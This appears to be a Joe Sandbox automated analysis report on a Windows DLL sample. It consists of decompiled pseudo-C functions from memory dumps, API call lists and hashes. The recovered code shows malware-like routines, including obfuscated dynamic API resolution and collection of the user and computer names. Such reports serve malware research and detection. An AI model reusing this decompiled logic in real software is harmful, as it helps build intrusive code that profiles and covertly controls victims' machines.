                                                                                                                                                                                                                                    							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                                                    							E02F984D5();
                                                                                                                                                                                                                                    							if(_t58 == 0) {
                                                                                                                                                                                                                                    								_v8 = GetLastError();
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                                                    								CloseHandle(_v32);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						HeapFree( *0x2f9d238, 0, _t68);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t70 = _v16;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                                                                                                                                                    				E02F99039(_t70);
                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                    0x02f9210f
                                                                                                                                                                                                                                    0x02f9215e
                                                                                                                                                                                                                                    0x02f92111
                                                                                                                                                                                                                                    0x02f92112
                                                                                                                                                                                                                                    0x02f92119
                                                                                                                                                                                                                                    0x02f92132
                                                                                                                                                                                                                                    0x02f92134
                                                                                                                                                                                                                                    0x02f92138
                                                                                                                                                                                                                                    0x02f9213f
                                                                                                                                                                                                                                    0x02f92159
                                                                                                                                                                                                                                    0x02f92141
                                                                                                                                                                                                                                    0x02f9214a
                                                                                                                                                                                                                                    0x02f9214f
                                                                                                                                                                                                                                    0x02f9214f
                                                                                                                                                                                                                                    0x02f9213f
                                                                                                                                                                                                                                    0x02f9216d
                                                                                                                                                                                                                                    0x02f9216d
                                                                                                                                                                                                                                    0x02f920e5
                                                                                                                                                                                                                                    0x02f9217c
                                                                                                                                                                                                                                    0x02f92185
                                                                                                                                                                                                                                    0x02f92189
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02F9207A,?,00000001,?,?,00000000,00000000), ref: 02F96951
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02F96973
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02F96989
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02F9699F
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02F969B5
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02F969CB
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F920C8
                                                                                                                                                                                                                                      • Part of subcall function 02F995B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,02F923E9,63699BCE,02F91354,73797325), ref: 02F995C2
                                                                                                                                                                                                                                      • Part of subcall function 02F995B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02F995DC
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4E52454B,033E8CEF,73797325), ref: 02F920FE
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02F92105
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 02F9216D
                                                                                                                                                                                                                                      • Part of subcall function 02F984D5: GetProcAddress.KERNEL32(36776F57,02F921E5), ref: 02F984F0
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000001), ref: 02F9214A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02F9214F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001), ref: 02F92153
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3075724336-0
                                                                                                                                                                                                                                    • Opcode ID: f722e70e85de42c6fa0e550703dd5e7dcee5d619f38e9c4093bd3c6f3486c566
                                                                                                                                                                                                                                    • Instruction ID: 90ca2f00a9e3b6d8e597af31a0605736caf87e6d76974c40da897c1477a2daa5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f722e70e85de42c6fa0e550703dd5e7dcee5d619f38e9c4093bd3c6f3486c566
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF310D72D0020CBFEF10AFA4DC88D9EBBBDEB48384F11446AE715A7121D735A9558F60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                                                                                    			E02F98307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                    				char* _t28;
                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    				char* _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                                                    				char* _t41;
                                                                                                                                                                                                                                    				char* _t42;
                                                                                                                                                                                                                                    				char* _t43;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t34 = __edx;
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t9 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t1 = _t9 + 0x2f9e62c; // 0x253d7325
                                                                                                                                                                                                                                    				_t36 = 0;
                                                                                                                                                                                                                                    				_t28 = E02F99401(__ecx, _t1);
                                                                                                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                                                                                                    					_t40 = __imp__;
                                                                                                                                                                                                                                    					_t13 =  *_t40(_t28);
                                                                                                                                                                                                                                    					_v8 = _t13;
                                                                                                                                                                                                                                    					_t41 = E02F92049(_v8 +  *_t40(_a4) + 1);
                                                                                                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                                                                                                    						strcpy(_t41, _t28);
                                                                                                                                                                                                                                    						_pop(_t33);
                                                                                                                                                                                                                                    						__imp__(_t41, _a4);
                                                                                                                                                                                                                                    						_t36 = E02F97225(_t34, _t41, _a8);
                                                                                                                                                                                                                                    						E02F99039(_t41);
                                                                                                                                                                                                                                    						_t42 = E02F98E82(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                                                    						if(_t42 != 0) {
                                                                                                                                                                                                                                    							E02F99039(_t36);
                                                                                                                                                                                                                                    							_t36 = _t42;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t43 = E02F9788B(_t36, _t33);
                                                                                                                                                                                                                                    						if(_t43 != 0) {
                                                                                                                                                                                                                                    							E02F99039(_t36);
                                                                                                                                                                                                                                    							_t36 = _t43;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E02F99039(_t28);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t36;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    0x02f98391
                                                                                                                                                                                                                                    0x02f98391
                                                                                                                                                                                                                                    0x02f9839a
                                                                                                                                                                                                                                    0x02f9839e
                                                                                                                                                                                                                                    0x02f983a1
                                                                                                                                                                                                                                    0x02f983a6
                                                                                                                                                                                                                                    0x02f983a6
                                                                                                                                                                                                                                    0x02f9839e
                                                                                                                                                                                                                                    0x02f983a9
                                                                                                                                                                                                                                    0x02f983a9
                                                                                                                                                                                                                                    0x02f983b4

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F99401: lstrlen.KERNEL32(00000000,00000000,00000000,73FCC740,?,?,?,02F98321,253D7325,00000000,00000000,73FCC740,?,?,02F9A428,?), ref: 02F99468
                                                                                                                                                                                                                                      • Part of subcall function 02F99401: sprintf.NTDLL ref: 02F99489
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,02F9A428,?,033E95B0), ref: 02F98332
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,?,02F9A428,?,033E95B0), ref: 02F9833A
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • strcpy.NTDLL ref: 02F98351
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 02F9835C
                                                                                                                                                                                                                                      • Part of subcall function 02F97225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02F9836B,00000000,?,?,?,02F9A428,?,033E95B0), ref: 02F9723C
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02F9A428,?,033E95B0), ref: 02F98379
                                                                                                                                                                                                                                      • Part of subcall function 02F98E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02F98385,00000000,?,?,02F9A428,?,033E95B0), ref: 02F98E8C
                                                                                                                                                                                                                                      • Part of subcall function 02F98E82: _snprintf.NTDLL ref: 02F98EEA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                    • String ID: =
                                                                                                                                                                                                                                    • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                    • Opcode ID: 2d7cbf0fb597f97a6fec39a75442b5a09382544056a1529ce1af0d58b704f340
                                                                                                                                                                                                                                    • Instruction ID: c072639e28d478b97a15457f75c01fbc10a30bdd46a8232cb5d723ff5af53813
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d7cbf0fb597f97a6fec39a75442b5a09382544056a1529ce1af0d58b704f340
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8711E373900224A76F127BB59C84C7E769E9F8AAD5706401AF70497200DA75CD025BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 02F96D1F
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0070006F), ref: 02F96D33
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 02F96D45
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F96DA9
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F96DB8
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F96DC3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                    • Opcode ID: ef253d975c32e8a733080c0340a3d8e844254fdc8476ed31a93da2040ee1311a
                                                                                                                                                                                                                                    • Instruction ID: c1da6f24be7fc4fa5f9fdf5bb0b26abf0b3096f8298ecc211b2e762def8aac9b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef253d975c32e8a733080c0340a3d8e844254fdc8476ed31a93da2040ee1311a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94318132D00609AFDF41EFBDC844A9FB7BAAF49344F144466EE15EB120DB71990ACB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F9692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t54 = E02F92049(0x20);
                                                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t23 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t1 = _t23 + 0x2f9e11a; // 0x4c44544e
                                                                                                                                                                                                                                    					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                                                    					_t26 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t2 = _t26 + 0x2f9e769; // 0x7243775a
                                                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                                                    					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                                                    					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                    					if(_t28 == 0) {
                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                    						E02F99039(_t54);
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t30 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    						_t5 = _t30 + 0x2f9e756; // 0x614d775a
                                                                                                                                                                                                                                    						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                                                    						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t33 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    							_t7 = _t33 + 0x2f9e40b; // 0x6e55775a
                                                                                                                                                                                                                                    							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                                                    							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                    							if(_t35 == 0) {
                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t36 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    								_t9 = _t36 + 0x2f9e4d2; // 0x4e6c7452
                                                                                                                                                                                                                                    								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                                                    								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                    								if(_t38 == 0) {
                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t39 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    									_t11 = _t39 + 0x2f9e779; // 0x6c43775a
                                                                                                                                                                                                                                    									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                                                    									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                    									if(_t41 == 0) {
                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                    										_t44 = E02F9727B(_t54, _a8);
                                                                                                                                                                                                                                    										_v8 = _t44;
                                                                                                                                                                                                                                    										if(_t44 != 0) {
                                                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											 *_a12 = _t54;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02F9207A,?,00000001,?,?,00000000,00000000), ref: 02F96951
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02F96973
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02F96989
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02F9699F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02F969B5
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02F969CB
                                                                                                                                                                                                                                      • Part of subcall function 02F9727B: memset.NTDLL ref: 02F972FA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1886625739-0
                                                                                                                                                                                                                                    • Opcode ID: b52df87f6e06551d09b3c1c6a35b3eb27b3318de802303432635e0254818f3ea
                                                                                                                                                                                                                                    • Instruction ID: 6177ca099b794c7c8bd17d427917270a94993dcb5c6ad9e7c8af476b56fc2b6f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b52df87f6e06551d09b3c1c6a35b3eb27b3318de802303432635e0254818f3ea
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D212FB1A4120ADFEB20DFAED844E5A77ECEB097C4702452AE615C7200E735E9058F60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F97649() {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                                                    				signed int _t47;
                                                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                                                    				int _t56;
                                                                                                                                                                                                                                    				int _t57;
                                                                                                                                                                                                                                    				char* _t63;
                                                                                                                                                                                                                                    				short* _t66;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				GetUserNameW(0,  &_v8);
                                                                                                                                                                                                                                    				_t39 = _v8;
                                                                                                                                                                                                                                    				if(_t39 != 0) {
                                                                                                                                                                                                                                    					_v12 = _t39;
                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                    					GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                    					_t43 = _v8;
                                                                                                                                                                                                                                    					if(_t43 != 0) {
                                                                                                                                                                                                                                    						_v12 = _v12 + _t43 + 2;
                                                                                                                                                                                                                                    						_t63 = E02F92049(_v12 + _t43 + 2 << 2);
                                                                                                                                                                                                                                    						if(_t63 != 0) {
                                                                                                                                                                                                                                    							_t47 = _v12;
                                                                                                                                                                                                                                    							_t66 = _t63 + _t47 * 2;
                                                                                                                                                                                                                                    							_v8 = _t47;
                                                                                                                                                                                                                                    							if(GetUserNameW(_t66,  &_v8) == 0) {
                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                    								E02F99039(_t63);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                                                                                                                                                                                                                                    								_t52 = _v8;
                                                                                                                                                                                                                                    								_v12 = _v12 - _t52;
                                                                                                                                                                                                                                    								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                                                                                                                                                                                                                                    									goto L7;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t56 = _v12 + _v8;
                                                                                                                                                                                                                                    									_t31 = _t56 + 2; // 0x2f9a33a
                                                                                                                                                                                                                                    									_v12 = _t56;
                                                                                                                                                                                                                                    									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
                                                                                                                                                                                                                                    									_v8 = _t57;
                                                                                                                                                                                                                                    									if(_t57 == 0) {
                                                                                                                                                                                                                                    										goto L7;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t63[_t57] = 0;
                                                                                                                                                                                                                                    										_v16 = _t63;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,02F9A338), ref: 02F9765D
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,02F9A338), ref: 02F97679
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,02F9A338), ref: 02F976B3
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(02F9A338,?), ref: 02F976D5
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02F9A338,00000000,02F9A33A,00000000,00000000,?,?,02F9A338), ref: 02F976F8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3850880919-0
                                                                                                                                                                                                                                    • Opcode ID: a499c500296d791073d0248f59537c8a5875d3ddd779b25751c740f629939241
                                                                                                                                                                                                                                    • Instruction ID: 5935e887fff376c7e844399e777df5b08d80e1a5e743383e0f827d6a2faea69d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a499c500296d791073d0248f59537c8a5875d3ddd779b25751c740f629939241
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6921D9B6D1020CFBDB11DFA9D985CEEFBB8EE44384B5044AAE601E7210D731AB44DB61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                    			E02F91585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				long _t10;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t9 = __eax;
                                                                                                                                                                                                                                    				_t22 = __eax;
                                                                                                                                                                                                                                    				if(_a4 != 0 && E02F97F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t10 = E02F9A9AB(_t9, _t18, _t22, _a8);
                                                                                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                                                                                    					ResetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                                                    					ResetEvent( *(_t22 + 0x20));
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0xffffffff);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                                                                                                                                                                                                    					if( *0x2f9d130() != 0) {
                                                                                                                                                                                                                                    						SetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t10 = GetLastError();
                                                                                                                                                                                                                                    						if(_t10 == 0x3e5) {
                                                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                                                    							_t10 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t10 == 0xffffffff) {
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t10;
                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,02F911DA,?,?,00000000,00000000), ref: 02F915BF
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 02F915C4
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F915DC
